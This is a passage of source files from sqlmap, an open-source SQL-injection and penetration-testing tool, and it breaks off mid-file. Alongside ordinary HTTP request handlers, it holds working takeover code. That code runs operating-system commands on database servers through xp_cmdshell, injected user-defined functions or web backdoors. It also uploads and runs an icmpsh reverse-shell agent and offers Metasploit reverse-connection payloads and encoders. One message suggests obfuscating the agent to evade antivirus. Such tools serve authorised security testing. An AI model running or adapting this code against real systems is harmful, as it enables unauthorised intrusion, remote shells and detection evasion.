    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.data import conf\nfrom lib.core.common import getSafeExString\nfrom lib.core.exception import SqlmapConnectionException\nfrom thirdparty.six.moves import http_client as _http_client\nfrom thirdparty.six.moves import urllib as _urllib\n\nclass HTTPSPKIAuthHandler(_urllib.request.HTTPSHandler):\n    def __init__(self, auth_file):\n        _urllib.request.HTTPSHandler.__init__(self)\n        self.auth_file = auth_file\n\n    def https_open(self, req):\n        return self.do_open(self.getConnection, req)\n\n    def getConnection(self, host, timeout=None):\n        try:\n            # Reference: https://docs.python.org/2/library/ssl.html#ssl.SSLContext.load_cert_chain\n            return _http_client.HTTPSConnection(host, cert_file=self.auth_file, key_file=self.auth_file, timeout=conf.timeout)\n        except IOError as ex:\n            errMsg = \"error occurred while using key \"\n            errMsg += \"file '%s' ('%s')\" % (self.auth_file, getSafeExString(ex))\n            raise SqlmapConnectionException(errMsg)\n"
  },
  {
    "path": "sqlmap/lib/request/rangehandler.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.exception import SqlmapConnectionException\nfrom thirdparty.six.moves import urllib as _urllib\n\nclass HTTPRangeHandler(_urllib.request.BaseHandler):\n    \"\"\"\n    Handler that enables HTTP Range headers.\n\n    Reference: http://stackoverflow.com/questions/1971240/python-seek-on-remote-file\n    \"\"\"\n\n    def http_error_206(self, req, fp, code, msg, hdrs):\n        # 206 Partial Content Response\n        r = _urllib.response.addinfourl(fp, hdrs, req.get_full_url())\n        r.code = code\n        r.msg = msg\n        return r\n\n    def http_error_416(self, req, fp, code, msg, hdrs):\n        # HTTP's Range Not Satisfiable error\n        errMsg = \"there was a problem while connecting \"\n        errMsg += \"target ('406 - Range Not Satisfiable')\"\n        raise SqlmapConnectionException(errMsg)\n"
  },
  {
    "path": "sqlmap/lib/request/redirecthandler.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport io\nimport time\nimport types\n\nfrom lib.core.common import getHostHeader\nfrom lib.core.common import getSafeExString\nfrom lib.core.common import logHTTPTraffic\nfrom lib.core.common import readInput\nfrom lib.core.convert import getBytes\nfrom lib.core.convert import getUnicode\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.enums import CUSTOM_LOGGING\nfrom lib.core.enums import HTTP_HEADER\nfrom lib.core.enums import HTTPMETHOD\nfrom lib.core.enums import REDIRECTION\nfrom lib.core.exception import SqlmapConnectionException\nfrom lib.core.settings import DEFAULT_COOKIE_DELIMITER\nfrom lib.core.settings import MAX_CONNECTION_READ_SIZE\nfrom lib.core.settings import MAX_CONNECTION_TOTAL_SIZE\nfrom lib.core.settings import MAX_SINGLE_URL_REDIRECTIONS\nfrom lib.core.settings import MAX_TOTAL_REDIRECTIONS\nfrom lib.core.threads import getCurrentThreadData\nfrom lib.request.basic import decodePage\nfrom lib.request.basic import parseResponse\nfrom thirdparty import six\nfrom thirdparty.six.moves import urllib as _urllib\n\nclass SmartRedirectHandler(_urllib.request.HTTPRedirectHandler):\n    def _get_header_redirect(self, headers):\n        retVal = None\n\n        if headers:\n            if HTTP_HEADER.LOCATION in headers:\n                retVal = headers[HTTP_HEADER.LOCATION]\n            elif HTTP_HEADER.URI in headers:\n                retVal = headers[HTTP_HEADER.URI]\n\n        return retVal\n\n    def _ask_redirect_choice(self, redcode, redurl, method):\n        with kb.locks.redirect:\n            if kb.choices.redirect is None:\n                msg = \"got a %d redirect to \" % redcode\n                msg += \"'%s'. Do you want to follow? [Y/n] \" % redurl\n\n                kb.choices.redirect = REDIRECTION.YES if readInput(msg, default='Y', boolean=True) else REDIRECTION.NO\n\n            if kb.choices.redirect == REDIRECTION.YES and method == HTTPMETHOD.POST and kb.resendPostOnRedirect is None:\n                msg = \"redirect is a result of a \"\n                msg += \"POST request. Do you want to \"\n                msg += \"resend original POST data to a new \"\n                msg += \"location? [%s] \" % (\"Y/n\" if not kb.originalPage else \"y/N\")\n\n                kb.resendPostOnRedirect = readInput(msg, default=('Y' if not kb.originalPage else 'N'), boolean=True)\n\n            if kb.resendPostOnRedirect:\n                self.redirect_request = self._redirect_request\n\n    def _redirect_request(self, req, fp, code, msg, headers, newurl):\n        return _urllib.request.Request(newurl.replace(' ', '%20'), data=req.data, headers=req.headers, origin_req_host=req.get_origin_req_host())\n\n    def http_error_302(self, req, fp, code, msg, headers):\n        start = time.time()\n        content = None\n        redurl = self._get_header_redirect(headers) if not conf.ignoreRedirects else None\n\n        try:\n            content = fp.read(MAX_CONNECTION_TOTAL_SIZE)\n        except:  # e.g. IncompleteRead\n            content = b\"\"\n        finally:\n            if content:\n                try:  # try to write it back to the read buffer so we could reuse it in further steps\n                    fp.fp._rbuf.truncate(0)\n                    fp.fp._rbuf.write(content)\n                except:\n                    pass\n\n        content = decodePage(content, headers.get(HTTP_HEADER.CONTENT_ENCODING), headers.get(HTTP_HEADER.CONTENT_TYPE))\n\n        threadData = getCurrentThreadData()\n        threadData.lastRedirectMsg = (threadData.lastRequestUID, content)\n\n        redirectMsg = \"HTTP redirect \"\n        redirectMsg += \"[#%d] (%d %s):\\r\\n\" % (threadData.lastRequestUID, code, getUnicode(msg))\n\n        if headers:\n            logHeaders = \"\\r\\n\".join(\"%s: %s\" % (getUnicode(key.capitalize() if hasattr(key, \"capitalize\") else key), getUnicode(value)) for (key, value) in headers.items())\n        else:\n            logHeaders = \"\"\n\n        redirectMsg += logHeaders\n        if content:\n            redirectMsg += \"\\r\\n\\r\\n%s\" % getUnicode(content[:MAX_CONNECTION_READ_SIZE])\n\n        logHTTPTraffic(threadData.lastRequestMsg, redirectMsg, start, time.time())\n        logger.log(CUSTOM_LOGGING.TRAFFIC_IN, redirectMsg)\n\n        if redurl:\n            try:\n                if not _urllib.parse.urlsplit(redurl).netloc:\n                    redurl = _urllib.parse.urljoin(req.get_full_url(), redurl)\n\n                self._infinite_loop_check(req)\n                self._ask_redirect_choice(code, redurl, req.get_method())\n            except ValueError:\n                redurl = None\n                result = fp\n\n        if redurl and kb.choices.redirect == REDIRECTION.YES:\n            parseResponse(content, headers)\n\n            req.headers[HTTP_HEADER.HOST] = getHostHeader(redurl)\n            if headers and HTTP_HEADER.SET_COOKIE in headers:\n                cookies = dict()\n                delimiter = conf.cookieDel or DEFAULT_COOKIE_DELIMITER\n                last = None\n\n                for part in getUnicode(req.headers.get(HTTP_HEADER.COOKIE, \"\")).split(delimiter) + ([headers[HTTP_HEADER.SET_COOKIE]] if HTTP_HEADER.SET_COOKIE in headers else []):\n                    if '=' in part:\n                        part = part.strip()\n                        key, value = part.split('=', 1)\n                        cookies[key] = value\n                        last = key\n                    elif last:\n                        cookies[last] += \"%s%s\" % (delimiter, part)\n\n                req.headers[HTTP_HEADER.COOKIE] = delimiter.join(\"%s=%s\" % (key, cookies[key]) for key in cookies)\n\n            try:\n                result = _urllib.request.HTTPRedirectHandler.http_error_302(self, req, fp, code, msg, headers)\n            except _urllib.error.HTTPError as ex:\n                result = ex\n\n                # Dirty hack for https://github.com/sqlmapproject/sqlmap/issues/4046\n                try:\n                    hasattr(result, \"read\")\n                except KeyError:\n                    class _(object):\n                        pass\n                    result = _()\n\n                # Dirty hack for http://bugs.python.org/issue15701\n                try:\n                    result.info()\n                except AttributeError:\n                    def _(self):\n                        return getattr(self, \"hdrs\", {})\n\n                    result.info = types.MethodType(_, result)\n\n                if not hasattr(result, \"read\"):\n                    def _(self, length=None):\n                        try:\n                            retVal = getSafeExString(ex)        # Note: pyflakes mistakenly marks 'ex' as undefined (NOTE: tested in both Python2 and Python3)\n                        except:\n                            retVal = \"\"\n                        return getBytes(retVal)\n\n                    result.read = types.MethodType(_, result)\n\n                if not getattr(result, \"url\", None):\n                    result.url = redurl\n\n                if not getattr(result, \"code\", None):\n                    result.code = 999\n            except:\n                redurl = None\n                result = fp\n                fp.read = io.BytesIO(b\"\").read\n        else:\n            result = fp\n\n        threadData.lastRedirectURL = (threadData.lastRequestUID, redurl)\n\n        result.redcode = code\n        result.redurl = getUnicode(redurl) if six.PY3 else redurl\n        return result\n\n    http_error_301 = http_error_303 = http_error_307 = http_error_302\n\n    def _infinite_loop_check(self, req):\n        if hasattr(req, 'redirect_dict') and (req.redirect_dict.get(req.get_full_url(), 0) >= MAX_SINGLE_URL_REDIRECTIONS or len(req.redirect_dict) >= MAX_TOTAL_REDIRECTIONS):\n            errMsg = \"infinite redirect loop detected (%s). \" % \", \".join(item for item in req.redirect_dict.keys())\n            errMsg += \"Please check all provided parameters and/or provide missing ones\"\n            raise SqlmapConnectionException(errMsg)\n"
  },
  {
    "path": "sqlmap/lib/request/templates.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.data import kb\nfrom lib.request.connect import Connect as Request\n\ndef getPageTemplate(payload, place):\n    retVal = (kb.originalPage, kb.errorIsNone)\n\n    if payload and place:\n        if (payload, place) not in kb.pageTemplates:\n            page, _, _ = Request.queryPage(payload, place, content=True, raise404=False)\n            kb.pageTemplates[(payload, place)] = (page, kb.lastParserStatus is None)\n\n        retVal = kb.pageTemplates[(payload, place)]\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/lib/takeover/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\npass\n"
  },
  {
    "path": "sqlmap/lib/takeover/abstraction.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom __future__ import print_function\n\nimport sys\n\nfrom lib.core.common import Backend\nfrom lib.core.common import dataToStdout\nfrom lib.core.common import getSQLSnippet\nfrom lib.core.common import isStackingAvailable\nfrom lib.core.common import readInput\nfrom lib.core.convert import getUnicode\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.enums import AUTOCOMPLETE_TYPE\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import OS\nfrom lib.core.exception import SqlmapFilePathException\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom lib.core.shell import autoCompletion\nfrom lib.request import inject\nfrom lib.takeover.udf import UDF\nfrom lib.takeover.web import Web\nfrom lib.takeover.xp_cmdshell import XP_cmdshell\nfrom lib.utils.safe2bin import safechardecode\nfrom thirdparty.six.moves import input as _input\n\nclass Abstraction(Web, UDF, XP_cmdshell):\n    \"\"\"\n    This class defines an abstraction layer for OS takeover functionalities\n    to UDF / XP_cmdshell objects\n    \"\"\"\n\n    def __init__(self):\n        self.envInitialized = False\n        self.alwaysRetrieveCmdOutput = False\n\n        UDF.__init__(self)\n        Web.__init__(self)\n        XP_cmdshell.__init__(self)\n\n    def execCmd(self, cmd, silent=False):\n        if Backend.isDbms(DBMS.PGSQL) and self.checkCopyExec():\n            self.copyExecCmd(cmd)\n\n        elif self.webBackdoorUrl and (not isStackingAvailable() or kb.udfFail):\n            self.webBackdoorRunCmd(cmd)\n\n        elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):\n            self.udfExecCmd(cmd, silent=silent)\n\n        elif Backend.isDbms(DBMS.MSSQL):\n            self.xpCmdshellExecCmd(cmd, silent=silent)\n\n        else:\n            errMsg = \"Feature not yet implemented for the back-end DBMS\"\n            raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def evalCmd(self, cmd, first=None, last=None):\n        retVal = None\n\n        if Backend.isDbms(DBMS.PGSQL) and self.checkCopyExec():\n            retVal = self.copyExecCmd(cmd)\n\n        elif self.webBackdoorUrl and (not isStackingAvailable() or kb.udfFail):\n            retVal = self.webBackdoorRunCmd(cmd)\n\n        elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):\n            retVal = self.udfEvalCmd(cmd, first, last)\n\n        elif Backend.isDbms(DBMS.MSSQL):\n            retVal = self.xpCmdshellEvalCmd(cmd, first, last)\n\n        else:\n            errMsg = \"Feature not yet implemented for the back-end DBMS\"\n            raise SqlmapUnsupportedFeatureException(errMsg)\n\n        return safechardecode(retVal)\n\n    def runCmd(self, cmd):\n        choice = None\n\n        if not self.alwaysRetrieveCmdOutput:\n            message = \"do you want to retrieve the command standard \"\n            message += \"output? [Y/n/a] \"\n            choice = readInput(message, default='Y').upper()\n\n            if choice == 'A':\n                self.alwaysRetrieveCmdOutput = True\n\n        if choice == 'Y' or self.alwaysRetrieveCmdOutput:\n            output = self.evalCmd(cmd)\n\n            if output:\n                conf.dumper.string(\"command standard output\", output)\n            else:\n                dataToStdout(\"No output\\n\")\n        else:\n            self.execCmd(cmd)\n\n    def shell(self):\n        if self.webBackdoorUrl and (not isStackingAvailable() or kb.udfFail):\n            infoMsg = \"calling OS shell. To quit type \"\n            infoMsg += \"'x' or 'q' and press ENTER\"\n            logger.info(infoMsg)\n\n        else:\n            if Backend.isDbms(DBMS.PGSQL) and self.checkCopyExec():\n                infoMsg = \"going to use 'COPY ... FROM PROGRAM ...' \"\n                infoMsg += \"command execution\"\n                logger.info(infoMsg)\n\n            elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):\n                infoMsg = \"going to use injected user-defined functions \"\n                infoMsg += \"'sys_eval' and 'sys_exec' for operating system \"\n                infoMsg += \"command execution\"\n                logger.info(infoMsg)\n\n            elif Backend.isDbms(DBMS.MSSQL):\n                infoMsg = \"going to use extended procedure 'xp_cmdshell' for \"\n                infoMsg += \"operating system command execution\"\n                logger.info(infoMsg)\n\n            else:\n                errMsg = \"feature not yet implemented for the back-end DBMS\"\n                raise SqlmapUnsupportedFeatureException(errMsg)\n\n            infoMsg = \"calling %s OS shell. To quit type \" % (Backend.getOs() or \"Windows\")\n            infoMsg += \"'x' or 'q' and press ENTER\"\n            logger.info(infoMsg)\n\n        autoCompletion(AUTOCOMPLETE_TYPE.OS, OS.WINDOWS if Backend.isOs(OS.WINDOWS) else OS.LINUX)\n\n        while True:\n            command = None\n\n            try:\n                command = _input(\"os-shell> \")\n                command = getUnicode(command, encoding=sys.stdin.encoding)\n            except KeyboardInterrupt:\n                print()\n                errMsg = \"user aborted\"\n                logger.error(errMsg)\n            except EOFError:\n                print()\n                errMsg = \"exit\"\n                logger.error(errMsg)\n                break\n\n            if not command:\n                continue\n\n            if command.lower() in (\"x\", \"q\", \"exit\", \"quit\"):\n                break\n\n            self.runCmd(command)\n\n    def _initRunAs(self):\n        if not conf.dbmsCred:\n            return\n\n        if not conf.direct and not isStackingAvailable():\n            errMsg = \"stacked queries are not supported hence sqlmap cannot \"\n            errMsg += \"execute statements as another user. The execution \"\n            errMsg += \"will continue and the DBMS credentials provided \"\n            errMsg += \"will simply be ignored\"\n            logger.error(errMsg)\n\n            return\n\n        if Backend.isDbms(DBMS.MSSQL):\n            msg = \"on Microsoft SQL Server 2005 and 2008, OPENROWSET function \"\n            msg += \"is disabled by default. This function is needed to execute \"\n            msg += \"statements as another DBMS user since you provided the \"\n            msg += \"option '--dbms-creds'. If you are DBA, you can enable it. \"\n            msg += \"Do you want to enable it? [Y/n] \"\n\n            if readInput(msg, default='Y', boolean=True):\n                expression = getSQLSnippet(DBMS.MSSQL, \"configure_openrowset\", ENABLE=\"1\")\n                inject.goStacked(expression)\n\n        # TODO: add support for PostgreSQL\n        # elif Backend.isDbms(DBMS.PGSQL):\n        #     expression = getSQLSnippet(DBMS.PGSQL, \"configure_dblink\", ENABLE=\"1\")\n        #     inject.goStacked(expression)\n\n    def initEnv(self, mandatory=True, detailed=False, web=False, forceInit=False):\n        self._initRunAs()\n\n        if self.envInitialized and not forceInit:\n            return\n\n        if web:\n            self.webInit()\n        else:\n            self.checkDbmsOs(detailed)\n\n            if mandatory and not self.isDba():\n                warnMsg = \"functionality requested probably does not work because \"\n                warnMsg += \"the current session user is not a database administrator\"\n\n                if not conf.dbmsCred and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.PGSQL):\n                    warnMsg += \". You can try to use option '--dbms-cred' \"\n                    warnMsg += \"to execute statements as a DBA user if you \"\n                    warnMsg += \"were able to extract and crack a DBA \"\n                    warnMsg += \"password by any mean\"\n\n                logger.warning(warnMsg)\n\n            if any((conf.osCmd, conf.osShell)) and Backend.isDbms(DBMS.PGSQL) and self.checkCopyExec():\n                success = True\n            elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):\n                success = self.udfInjectSys()\n\n                if success is not True:\n                    msg = \"unable to mount the operating system takeover\"\n                    raise SqlmapFilePathException(msg)\n            elif Backend.isDbms(DBMS.MSSQL):\n                if mandatory:\n                    self.xpCmdshellInit()\n            else:\n                errMsg = \"feature not yet implemented for the back-end DBMS\"\n                raise SqlmapUnsupportedFeatureException(errMsg)\n\n        self.envInitialized = True\n"
  },
  {
    "path": "sqlmap/lib/takeover/icmpsh.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport os\nimport re\nimport socket\nimport time\n\nfrom extra.icmpsh.icmpsh_m import main as icmpshmaster\nfrom lib.core.common import getLocalIP\nfrom lib.core.common import getRemoteIP\nfrom lib.core.common import normalizePath\nfrom lib.core.common import ntToPosixSlashes\nfrom lib.core.common import randomStr\nfrom lib.core.common import readInput\nfrom lib.core.data import conf\nfrom lib.core.data import logger\nfrom lib.core.data import paths\nfrom lib.core.exception import SqlmapDataException\n\nclass ICMPsh(object):\n    \"\"\"\n    This class defines methods to call icmpsh for plugins.\n    \"\"\"\n\n    def _initVars(self):\n        self.lhostStr = None\n        self.rhostStr = None\n        self.localIP = getLocalIP()\n        self.remoteIP = getRemoteIP() or conf.hostname\n        self._icmpslave = normalizePath(os.path.join(paths.SQLMAP_EXTRAS_PATH, \"icmpsh\", \"icmpsh.exe_\"))\n\n    def _selectRhost(self):\n        address = None\n        message = \"what is the back-end DBMS address? \"\n\n        if self.remoteIP:\n            message += \"[Enter for '%s' (detected)] \" % self.remoteIP\n\n        while not address:\n            address = readInput(message, default=self.remoteIP)\n\n            if conf.batch and not address:\n                raise SqlmapDataException(\"remote host address is missing\")\n\n        return address\n\n    def _selectLhost(self):\n        address = None\n        message = \"what is the local address? \"\n\n        if self.localIP:\n            message += \"[Enter for '%s' (detected)] \" % self.localIP\n\n        valid = None\n        while not valid:\n            valid = True\n            address = readInput(message, default=self.localIP or \"\")\n\n            try:\n                socket.inet_aton(address)\n            except socket.error:\n                valid = False\n            finally:\n                valid = valid and re.search(r\"\\d+\\.\\d+\\.\\d+\\.\\d+\", address) is not None\n\n            if conf.batch and not address:\n                raise SqlmapDataException(\"local host address is missing\")\n            elif address and not valid:\n                warnMsg = \"invalid local host address\"\n                logger.warning(warnMsg)\n\n        return address\n\n    def _prepareIngredients(self, encode=True):\n        self.localIP = getattr(self, \"localIP\", None)\n        self.remoteIP = getattr(self, \"remoteIP\", None)\n        self.lhostStr = ICMPsh._selectLhost(self)\n        self.rhostStr = ICMPsh._selectRhost(self)\n\n    def _runIcmpshMaster(self):\n        infoMsg = \"running icmpsh master locally\"\n        logger.info(infoMsg)\n\n        icmpshmaster(self.lhostStr, self.rhostStr)\n\n    def _runIcmpshSlaveRemote(self):\n        infoMsg = \"running icmpsh slave remotely\"\n        logger.info(infoMsg)\n\n        cmd = \"%s -t %s -d 500 -b 30 -s 128 &\" % (self._icmpslaveRemote, self.lhostStr)\n\n        self.execCmd(cmd, silent=True)\n\n    def uploadIcmpshSlave(self, web=False):\n        ICMPsh._initVars(self)\n        self._randStr = randomStr(lowercase=True)\n        self._icmpslaveRemoteBase = \"tmpi%s.exe\" % self._randStr\n\n        self._icmpslaveRemote = \"%s/%s\" % (conf.tmpPath, self._icmpslaveRemoteBase)\n        self._icmpslaveRemote = ntToPosixSlashes(normalizePath(self._icmpslaveRemote))\n\n        logger.info(\"uploading icmpsh slave to '%s'\" % self._icmpslaveRemote)\n\n        if web:\n            written = self.webUpload(self._icmpslaveRemote, os.path.split(self._icmpslaveRemote)[0], filepath=self._icmpslave)\n        else:\n            written = self.writeFile(self._icmpslave, self._icmpslaveRemote, \"binary\", forceCheck=True)\n\n        if written is not True:\n            errMsg = \"there has been a problem uploading icmpsh, it \"\n            errMsg += \"looks like the binary file has not been written \"\n            errMsg += \"on the database underlying file system or an AV has \"\n            errMsg += \"flagged it as malicious and removed it. In such a case \"\n            errMsg += \"it is recommended to recompile icmpsh with slight \"\n            errMsg += \"modification to the source code or pack it with an \"\n            errMsg += \"obfuscator software\"\n            logger.error(errMsg)\n\n            return False\n        else:\n            logger.info(\"icmpsh successfully uploaded\")\n            return True\n\n    def icmpPwn(self):\n        ICMPsh._prepareIngredients(self)\n        self._runIcmpshSlaveRemote()\n        self._runIcmpshMaster()\n\n        debugMsg = \"icmpsh master exited\"\n        logger.debug(debugMsg)\n\n        time.sleep(1)\n        self.execCmd(\"taskkill /F /IM %s\" % self._icmpslaveRemoteBase, silent=True)\n        time.sleep(1)\n        self.delRemoteFile(self._icmpslaveRemote)\n"
  },
  {
    "path": "sqlmap/lib/takeover/metasploit.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom __future__ import print_function\n\nimport errno\nimport os\nimport re\nimport select\nimport sys\nimport tempfile\nimport time\n\nfrom subprocess import PIPE\n\nfrom extra.cloak.cloak import cloak\nfrom extra.cloak.cloak import decloak\nfrom lib.core.common import dataToStdout\nfrom lib.core.common import Backend\nfrom lib.core.common import getLocalIP\nfrom lib.core.common import getRemoteIP\nfrom lib.core.common import isDigit\nfrom lib.core.common import normalizePath\nfrom lib.core.common import ntToPosixSlashes\nfrom lib.core.common import pollProcess\nfrom lib.core.common import randomRange\nfrom lib.core.common import randomStr\nfrom lib.core.common import readInput\nfrom lib.core.convert import getBytes\nfrom lib.core.convert import getText\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.data import paths\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import OS\nfrom lib.core.exception import SqlmapDataException\nfrom lib.core.exception import SqlmapFilePathException\nfrom lib.core.exception import SqlmapGenericException\nfrom lib.core.settings import IS_WIN\nfrom lib.core.settings import METASPLOIT_SESSION_TIMEOUT\nfrom lib.core.settings import SHELLCODEEXEC_RANDOM_STRING_MARKER\nfrom lib.core.subprocessng import blockingReadFromFD\nfrom lib.core.subprocessng import blockingWriteToFD\nfrom lib.core.subprocessng import Popen as execute\nfrom lib.core.subprocessng import send_all\nfrom lib.core.subprocessng import recv_some\nfrom thirdparty import six\n\nif IS_WIN:\n    import msvcrt\n\nclass Metasploit(object):\n    \"\"\"\n    This class defines methods to call Metasploit for plugins.\n    \"\"\"\n\n    def _initVars(self):\n        self.connectionStr = None\n        self.lhostStr = None\n        self.rhostStr = None\n        self.portStr = None\n        self.payloadStr = None\n        self.encoderStr = None\n        self.payloadConnStr = None\n        self.localIP = getLocalIP()\n        self.remoteIP = getRemoteIP() or conf.hostname\n        self._msfCli = normalizePath(os.path.join(conf.msfPath, \"msfcli%s\" % (\".bat\" if IS_WIN else \"\")))\n        self._msfConsole = normalizePath(os.path.join(conf.msfPath, \"msfconsole%s\" % (\".bat\" if IS_WIN else \"\")))\n        self._msfEncode = normalizePath(os.path.join(conf.msfPath, \"msfencode%s\" % (\".bat\" if IS_WIN else \"\")))\n        self._msfPayload = normalizePath(os.path.join(conf.msfPath, \"msfpayload%s\" % (\".bat\" if IS_WIN else \"\")))\n        self._msfVenom = normalizePath(os.path.join(conf.msfPath, \"msfvenom%s\" % (\".bat\" if IS_WIN else \"\")))\n\n        self._msfPayloadsList = {\n            \"windows\": {\n                1: (\"Meterpreter (default)\", \"windows/meterpreter\"),\n                2: (\"Shell\", \"windows/shell\"),\n                3: (\"VNC\", \"windows/vncinject\"),\n            },\n            \"linux\": {\n                1: (\"Shell (default)\", \"linux/x86/shell\"),\n                2: (\"Meterpreter (beta)\", \"linux/x86/meterpreter\"),\n            }\n        }\n\n        self._msfConnectionsList = {\n            \"windows\": {\n                1: (\"Reverse TCP: Connect back from the database host to this machine (default)\", \"reverse_tcp\"),\n                2: (\"Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535\", \"reverse_tcp_allports\"),\n                3: (\"Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP\", \"reverse_http\"),\n                4: (\"Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS\", \"reverse_https\"),\n                5: (\"Bind TCP: Listen on the database host for a connection\", \"bind_tcp\"),\n            },\n            \"linux\": {\n                1: (\"Reverse TCP: Connect back from the database host to this machine (default)\", \"reverse_tcp\"),\n                2: (\"Bind TCP: Listen on the database host for a connection\", \"bind_tcp\"),\n            }\n        }\n\n        self._msfEncodersList = {\n            \"windows\": {\n                1: (\"No Encoder\", \"generic/none\"),\n                2: (\"Alpha2 Alphanumeric Mixedcase Encoder\", \"x86/alpha_mixed\"),\n                3: (\"Alpha2 Alphanumeric Uppercase Encoder\", \"x86/alpha_upper\"),\n                4: (\"Avoid UTF8/tolower\", \"x86/avoid_utf8_tolower\"),\n                5: (\"Call+4 Dword XOR Encoder\", \"x86/call4_dword_xor\"),\n                6: (\"Single-byte XOR Countdown Encoder\", \"x86/countdown\"),\n                7: (\"Variable-length Fnstenv/mov Dword XOR Encoder\", \"x86/fnstenv_mov\"),\n                8: (\"Polymorphic Jump/Call XOR Additive Feedback Encoder\", \"x86/jmp_call_additive\"),\n                9: (\"Non-Alpha Encoder\", \"x86/nonalpha\"),\n                10: (\"Non-Upper Encoder\", \"x86/nonupper\"),\n                11: (\"Polymorphic XOR Additive Feedback Encoder (default)\", \"x86/shikata_ga_nai\"),\n                12: (\"Alpha2 Alphanumeric Unicode Mixedcase Encoder\", \"x86/unicode_mixed\"),\n                13: (\"Alpha2 Alphanumeric Unicode Uppercase Encoder\", \"x86/unicode_upper\"),\n            }\n        }\n\n        self._msfSMBPortsList = {\n            \"windows\": {\n                1: (\"139/TCP\", \"139\"),\n                2: (\"445/TCP (default)\", \"445\"),\n            }\n        }\n\n        self._portData = {\n            \"bind\": \"remote port number\",\n            \"reverse\": \"local port number\",\n        }\n\n    def _skeletonSelection(self, msg, lst=None, maxValue=1, default=1):\n        if Backend.isOs(OS.WINDOWS):\n            opSys = \"windows\"\n        else:\n            opSys = \"linux\"\n\n        message = \"which %s do you want to use?\" % msg\n\n        if lst:\n            for num, data in lst[opSys].items():\n                description = data[0]\n\n                if num > maxValue:\n                    maxValue = num\n\n                if \"(default)\" in description:\n                    default = num\n\n                message += \"\\n[%d] %s\" % (num, description)\n        else:\n            message += \" [%d] \" % default\n\n        choice = readInput(message, default=\"%d\" % default)\n\n        if not choice or not isDigit(choice) or int(choice) > maxValue or int(choice) < 1:\n            choice = default\n\n        choice = int(choice)\n\n        if lst:\n            choice = lst[opSys][choice][1]\n\n        return choice\n\n    def _selectSMBPort(self):\n        return self._skeletonSelection(\"SMB port\", self._msfSMBPortsList)\n\n    def _selectEncoder(self, encode=True):\n        # This is always the case except for --os-bof where the user can\n        # choose which encoder to use. When called from --os-pwn the encoder\n        # is always x86/alpha_mixed - used for sys_bineval() and\n        # shellcodeexec\n        if isinstance(encode, six.string_types):\n            return encode\n\n        elif encode:\n            return self._skeletonSelection(\"payload encoding\", self._msfEncodersList)\n\n    def _selectPayload(self):\n        if Backend.isOs(OS.WINDOWS) and conf.privEsc:\n            infoMsg = \"forcing Metasploit payload to Meterpreter because \"\n            infoMsg += \"it is the only payload that can be used to \"\n            infoMsg += \"escalate privileges via 'incognito' extension, \"\n            infoMsg += \"'getsystem' command or post modules\"\n            logger.info(infoMsg)\n\n            _payloadStr = \"windows/meterpreter\"\n        else:\n            _payloadStr = self._skeletonSelection(\"payload\", self._msfPayloadsList)\n\n        if _payloadStr == \"windows/vncinject\":\n            choose = False\n\n            if Backend.isDbms(DBMS.MYSQL):\n                debugMsg = \"by default MySQL on Windows runs as SYSTEM \"\n                debugMsg += \"user, it is likely that the the VNC \"\n                debugMsg += \"injection will be successful\"\n                logger.debug(debugMsg)\n\n            elif Backend.isDbms(DBMS.PGSQL):\n                choose = True\n\n                warnMsg = \"by default PostgreSQL on Windows runs as \"\n                warnMsg += \"postgres user, it is unlikely that the VNC \"\n                warnMsg += \"injection will be successful\"\n                logger.warning(warnMsg)\n\n            elif Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin((\"2005\", \"2008\")):\n                choose = True\n\n                warnMsg = \"it is unlikely that the VNC injection will be \"\n                warnMsg += \"successful because usually Microsoft SQL Server \"\n                warnMsg += \"%s runs as Network Service \" % Backend.getVersion()\n                warnMsg += \"or the Administrator is not logged in\"\n                logger.warning(warnMsg)\n\n            if choose:\n                message = \"what do you want to do?\\n\"\n                message += \"[1] Give it a try anyway\\n\"\n                message += \"[2] Fall back to Meterpreter payload (default)\\n\"\n                message += \"[3] Fall back to Shell payload\"\n\n                while True:\n                    choice = readInput(message, default=\"2\")\n\n                    if not choice or choice == 